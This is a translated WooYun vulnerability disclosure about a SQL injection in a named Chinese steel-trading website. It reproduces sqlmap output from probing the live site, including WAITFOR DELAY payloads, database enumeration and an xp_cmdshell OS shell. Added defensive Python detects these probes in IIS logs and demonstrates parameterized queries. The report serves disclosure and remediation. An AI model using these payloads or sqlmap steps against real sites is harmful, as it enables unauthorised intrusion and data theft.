
Vulnerability summary

Defect ID: wooyun-2014-077429

Title: 中国钢铁现货网 (China Steel Spot Network) # one serious vulnerability

Vendor: 钢铁现货网

Author: 爱上平顶山

Submitted: 2014-09-26 16:57

Fix time: 2014-11-10 16:58

Published: 2014-11-10 16:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-09-26: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-11-10: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

0.0
拉手网 (Lashou) special session; looked through all of them and, damn, not a single one is hiring for a security position~

Detailed description:

中国钢铁现货网 (China Steel Spot Network)
Injection point: http://baike.gtxh.com/gtbk.aspx?mid=9c71fe4a9321440483adb38cd2ee8aca
sqlmap identified the following injection points with a total of 166 HTTP(s) requests:
---
Place: GET
Parameter: mid
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: mid=9c71fe4a9321440483adb38cd2ee8aca'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: mid=9c71fe4a9321440483adb38cd2ee8aca' WAITFOR DELAY '0:0:5'--
---
[14:51:39] [INFO] testing MySQL
[14:51:39] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[14:51:39] [WARNING] the back-end DBMS is not MySQL
[14:51:39] [INFO] testing Oracle
[14:51:40] [WARNING] the back-end DBMS is not Oracle
[14:51:40] [INFO] testing PostgreSQL
[14:51:40] [WARNING] the back-end DBMS is not PostgreSQL
[14:51:40] [INFO] testing Microsoft SQL Server
[14:51:50] [INFO] confirming Microsoft SQL Server
[14:52:10] [INFO] adjusting time delay to 3 seconds due to good response times
[14:52:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[14:52:16] [INFO] fetched data logged to text files under 'D:\SqlMap免Python版\Bin\output\baike.gtxh.com'
[*] shutting down at 14:52:16
D:\SqlMap免Python版\Bin>Sqlmap.exe -u "http://baike.gtxh.com/gtbk.aspx?mid=9c71fe4a9321440483adb38cd2ee8aca" --dbs
[*] starting at 14:52:27
[14:52:28] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:52:28] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://baike.gtxh.com:80/Html/gtbk_9c71f.html'. Do you want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: mid
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: mid=9c71fe4a9321440483adb38cd2ee8aca'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: mid=9c71fe4a9321440483adb38cd2ee8aca' WAITFOR DELAY '0:0:5'--
---
[14:52:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[14:52:29] [INFO] fetching database names
[14:52:29] [INFO] fetching number of databases
[14:52:30] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[14:52:31] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
2
[14:53:03] [INFO] adjusting time delay to 1 second due to good response times
0
[14:53:06] [INFO] retrieved: dh
[14:53:28] [INFO] retrieved: gtxh_Analysts
...
and so on, 20 databases in total~
Slow, so I stopped running it.
D:\SqlMap免Python版\Bin>Sqlmap.exe -u "http://baike.gtxh.com/gtbk.aspx?mid=9c71fe4a9321440483adb38cd2ee8aca" --os-shell
[*] starting at 15:27:41
[15:27:42] [INFO] resuming back-end DBMS 'microsoft sql server'
[15:27:45] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://baike.gtxh.com:80/Html/gtbk_9c71f.html'. Do you want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: mid
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: mid=9c71fe4a9321440483adb38cd2ee8aca'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: mid=9c71fe4a9321440483adb38cd2ee8aca' WAITFOR DELAY '0:0:5'--
---
[15:28:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:28:08] [INFO] fingerprinting the back-end DBMS operating system version and service pack
[15:28:08] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:30:45] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[15:33:02] [WARNING] unable to fingerprint the underlying operating system version, assuming it is Windows 2003 Service Pack 2
[15:33:08] [INFO] testing if current user is DBA
[15:33:38] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
[15:34:02] [INFO] adjusting time delay to 4 seconds due to good response times
[15:34:02] [INFO] xp_cmdshell extended procedure is available
[15:34:33] [INFO] testing if xp_cmdshell extended procedure is usable
[15:35:49] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[15:35:49] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
...
ok
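From the defender's side, the probing shown above leaves a distinctive trace in the web server's own logs. The following Python script is an added example, not part of the original report or of the site's code: it scans IIS W3C log records for the kind of time-based and stacked-query probing the sqlmap output documents, flagging a `mid` value that is not a 32-digit hex token (an assumption taken from the URL in the report), decoded query strings that carry `WAITFOR DELAY`, a quote followed by a semicolon, or a SQL comment, and requests whose time-taken is long enough to be a delay probe. The log lines are constructed for this example; the field layout follows the default IIS 7.5 W3C format.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed IIS 7.5 W3C log excerpt (sample data for this example, not from the
# report). Records 3 and 4 mirror the two sqlmap time-based payloads; record 5 is
# a malformed but non-SQL value.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2014-09-26 06:51:39 10.0.0.5 GET /gtbk.aspx mid=9c71fe4a9321440483adb38cd2ee8aca 80 - 203.0.113.7 Mozilla/5.0 302 0 0 120
2014-09-26 06:51:40 10.0.0.5 GET /gtbk.aspx mid=9c71fe4a9321440483adb38cd2ee8aca%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B-- 80 - 203.0.113.7 sqlmap/1.0 302 0 0 5132
2014-09-26 06:51:46 10.0.0.5 GET /gtbk.aspx mid=9c71fe4a9321440483adb38cd2ee8aca%27+WAITFOR+DELAY+%270%3A0%3A5%27-- 80 - 203.0.113.7 sqlmap/1.0 302 0 0 5098
2014-09-26 06:52:01 10.0.0.5 GET /gtbk.aspx mid=zz 80 - 198.51.100.2 Mozilla/5.0 500 0 0 30
"""

# Assumption taken from the report's URL: a legitimate mid is a 32-digit lowercase hex token.
MID_RE = re.compile(r"^[0-9a-f]{32}$")

# Signatures of SQL Server time-based / stacked-query probing, matched against
# the URL-decoded query string.
SQLI_SIGNATURES = {
    "waitfor_delay": re.compile(r"waitfor\s+delay", re.IGNORECASE),
    "stacked_query": re.compile(r"'\s*;"),
    "sql_comment": re.compile(r"--|/\*"),
}
SLOW_MS = 4000  # a 5 s WAITFOR probe shows up as a long time-taken


def parse_iis_line(line, fields):
    """Split one W3C record into a dict keyed by the names from the #Fields header."""
    parts = line.split()
    if len(parts) != len(fields):
        return None  # malformed or truncated record
    return dict(zip(fields, parts))


def analyze_iis_log(log_text):
    """Return one finding per suspicious record: line number, client IP and reasons."""
    fields = None
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # the field layout is declared in the log header
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = parse_iis_line(line, fields)
        if rec is None or rec.get("cs-uri-query", "-") == "-":
            continue
        raw_query = rec["cs-uri-query"]
        reasons = []
        decoded = unquote_plus(raw_query)
        for name, pattern in SQLI_SIGNATURES.items():
            if pattern.search(decoded):
                reasons.append(name)
        # parse_qs does its own percent-decoding, so it gets the raw query string
        params = parse_qs(raw_query, keep_blank_values=True)
        if any(not MID_RE.match(v) for v in params.get("mid", [])):
            reasons.append("malformed_mid")
        if rec.get("time-taken", "0").isdigit() and int(rec["time-taken"]) >= SLOW_MS:
            reasons.append("slow_response")
        if reasons:
            findings.append({"line": lineno, "client": rec.get("c-ip"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze_iis_log(SAMPLE_LOG):
        print(f"line {f['line']} from {f['client']}: {', '.join(f['reasons'])}")
```

The two probe records are flagged on four or five independent grounds each, while the malformed `mid=zz` request is flagged only for failing the token format; in practice the combination of a signature hit and a long time-taken from the same client is the strongest indicator, and the format check alone is useful mainly for catching the first malformed requests before any delay payload arrives.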

Proof of vulnerability:

As above

Fix recommendation:

Filtering~
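The report's remediation is a single word. As an added example that is not from the report or from the site's own code, the Python below shows what filtering should mean for this endpoint: a strict allow-list check on `mid` (assumed, from the URL in the report, to be a 32-digit hex token) combined with a parameterized query, placed next to the string-concatenation pattern that produces this class of bug. SQLite stands in for SQL Server so the script runs offline; the table and its rows are constructed for the example.

```python
import re
import sqlite3

# Assumption taken from the report's URL: a legitimate mid is a 32-digit lowercase hex token.
MID_RE = re.compile(r"[0-9a-f]{32}")


def open_demo_db():
    """In-memory SQLite table standing in for the site's SQL Server data (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE entries (mid TEXT PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO entries VALUES (?, ?)",
        [("9c71fe4a9321440483adb38cd2ee8aca", "entry one"), ("0" * 32, "entry two")],
    )
    return conn


def lookup_concat(conn, mid):
    """The bug class in the report: the request value is spliced into the SQL text."""
    sql = "SELECT title FROM entries WHERE mid = '" + mid + "'"
    return sorted(row[0] for row in conn.execute(sql))


def lookup_param(conn, mid):
    """Parameterized query: the value travels separately and is never parsed as SQL."""
    rows = conn.execute("SELECT title FROM entries WHERE mid = ?", (mid,))
    return sorted(row[0] for row in rows)


def lookup_safe(conn, mid):
    """Allow-list validation first, then the parameterized lookup."""
    if not MID_RE.fullmatch(mid):
        raise ValueError("mid must be a 32-character lowercase hex token")
    return lookup_param(conn, mid)


if __name__ == "__main__":
    conn = open_demo_db()
    probe = "9c71fe4a9321440483adb38cd2ee8aca' WAITFOR DELAY '0:0:5'--"
    print(lookup_safe(conn, "9c71fe4a9321440483adb38cd2ee8aca"))  # ['entry one']
    print(lookup_param(conn, probe))  # []: treated as a literal, matches no row
    try:
        lookup_safe(conn, probe)
    except ValueError as e:
        print("rejected:", e)
    # With concatenation the closing quote in the value ends the literal, so a
    # tautology returns every row; the same input through lookup_param returns none.
    print(lookup_concat(conn, "' OR 'a'='a"))  # ['entry one', 'entry two']
    print(lookup_param(conn, "' OR 'a'='a"))  # []
```

Validation and parameterization cover different failure modes and both belong in the fix: the format check rejects anything that is not a token before a query is built, and the parameter binding guarantees that whatever does reach the database is data. The report also shows that the application's database login was able to run xp_cmdshell, which is what turned a blind injection into an OS shell; independent of the code fix, the application should connect with a login that is not a member of sysadmin, and xp_cmdshell should stay disabled (sp_configure 'xp_cmdshell', 0) unless a specific process needs it.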

Copyright notice: when reposting, please credit the source: 爱上平顶山@乌云


Vulnerability response

Vendor response:

Could not contact the vendor, or the vendor actively refused